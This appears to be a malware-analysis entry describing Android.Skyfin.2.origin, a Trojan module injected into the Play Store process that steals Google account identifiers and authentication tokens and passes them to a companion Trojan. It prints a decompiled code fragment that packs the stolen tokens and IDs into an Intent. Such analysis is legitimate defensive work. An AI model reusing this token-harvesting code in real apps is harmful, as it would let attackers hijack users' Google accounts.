- d73bbca5da162ec8f95e85ce884b899a46f14e46
A malicious program module which is a component of the Android.Skyfin.1.origin Trojan. It is implemented as an executable DEX file of the Dalvik virtual machine. Android.Skyfin.1.origin injects this module into the Play Store running process
Android.Skyfin.2.origin creates a local socket and waits for the connection with Android.Skyfin.1.origin. The module Android.Skyfin.2.origin then responds with the parameter OK\nAfter that, it steals and sends Android.Skyfin.1.origin the following data:
Intent intent0 = new Intent("");
intent0.putExtra("tocCookie", ((String)object3)); // a unique ID generated after the acceptance of the Play Store license agreement;
intent0.putExtra("loggingId", ((String)object0)); // a unique user ID for the Google services;
intent0.putExtra("androidId", string0); // a unique device identifier for the Google services;
intent0.putExtra("androidmarket", string1); // AuthToken;
intent0.putExtra("androidsecure", string2); // AuthToken;
intent0.putExtra("ac2dm", string3); // AuthToken for the outdated version of Google Cloud;
intent0.putExtra("account_type", account0.type);